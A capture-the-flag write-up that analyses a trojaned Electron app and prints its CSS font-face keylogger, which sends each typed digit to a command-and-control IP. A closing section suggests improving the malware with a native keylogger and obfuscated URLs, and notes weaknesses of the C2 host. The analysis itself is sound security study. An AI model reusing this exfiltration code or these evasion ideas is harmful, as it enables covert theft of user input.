Hello Penetration Testers,
{This is our Writeup for ASC 2018 CYBER WARGAMES “QUALIFICATION PHASE” }
Task one: find out what is going on wrong with the downloaded app?
-Electron is js framework used to Build desktop apps in linux and windows as well
-By comparing the md5 hashes with orignal md5 hashes from
github: https://github.com/electron/electron/releases/tag/v2.0.0
we’ve found that 90% of the app is safe since it’s a typical match from the author.
Task two: write a writeup about the malicious functionality and how did you find about it
-However the other 10% is malicious…
I executed file and in another terminal window
I wrote ps -ax to get process PEID
Then i wrote
cat /proc/{peid}/maps
– While reading i found something “/root/.config/wargames2018/“
– I analyzed the files in that path and i found requests to servers
-Since all the electron apps are packed through asar so it’s can be unpack without any problems.
-By extracting the `resources/app.asar` file
The App sends a malicious reqeusts to the following ip “142.93.106.129”
(1)/resources/app/index.html
|_> http://142.93.106.129/0000
|_> http://142.93.106.129/0001
|_> http://142.93.106.129/0010
|_> http://142.93.106.129/0011
|_> http://142.93.106.129/0100
|_> http://142.93.106.129/0101
|_> http://142.93.106.129/0111
|_> http://142.93.106.129/1000
|_> http://142.93.106.129/1001
(2)/resources/app/style.css
|_> http://142.93.106.129/log?a
|_> http://142.93.106.129/log?b
|_> http://142.93.106.129/log?c
|_> http://142.93.106.129/log?d
By decoding the binary from set (1)
|_> http://142.93.106.129/0
|_> http://142.93.106.129/1
|_> http://142.93.106.129/2
|_> http://142.93.106.129/3
|_> http://142.93.106.129/4
|_> http://142.93.106.129/5
|_> http://142.93.106.129/6
|_> http://142.93.106.129/7
|_> http://142.93.106.129/8
after looking at the following code
@font-face { font-family: x; src: url(http://142.93.106.129/0000); unicode-range: U+30; }
@font-face { font-family: x; src: url(http://142.93.106.129/0001); unicode-range: U+31; }
@font-face { font-family: x; src: url(http://142.93.106.129/0010); unicode-range: U+32; }
@font-face { font-family: x; src: url(http://142.93.106.129/0011); unicode-range: U+33; }
@font-face { font-family: x; src: url(http://142.93.106.129/0100); unicode-range: U+34; }
@font-face { font-family: x; src: url(http://142.93.106.129/0101); unicode-range: U+35; }
@font-face { font-family: x; src: url(http://142.93.106.129/0110); unicode-range: U+36; }
@font-face { font-family: x; src: url(http://142.93.106.129/0111); unicode-range: U+37; }
@font-face { font-family: x; src: url(http://142.93.106.129/1000); unicode-range: U+38; }
@font-face { font-family: x; src: url(http://142.93.106.129/1001); unicode-range: U+39; }
C2 Server is 142.93.106.129
and the path is just numbers [1-9]
then it’s tracking user input
input { font-family: x
so for example:
if user write pin 1234
by applying this filter in wireshark
” http && ip.addr == 142.93.106.129 ”
and start writing the pin
we can see the http requests to the server
GET /0001 HTTP/1.1
GET /0010 HTTP/1.1
GET /0011 HTTP/1.1
GET /0100 HTTP/1.1
0001 0010 0011 0100 = 1234
Task Three: Bonus and Improving
#1
– You can create a Keylogger and binding it with electron app because (keylogger wrote in c or c++) is better than (keylogger with cache and JavaScript)
– By step 1 .. the keylogger will be always conntected to a server like Trojans e.g (nJRAT) it’s better than every 3min the app sends requests with cache keystrokes.
#2
This can be improved by using javascript to obfuscate the urls and inject to make it a little harder find
#3
https://www.shodan.io/host/142.93.106.129
Host “142.93.106.129” is using outdated version of apache 2.4.7
With open ssh port
Best,
Youssef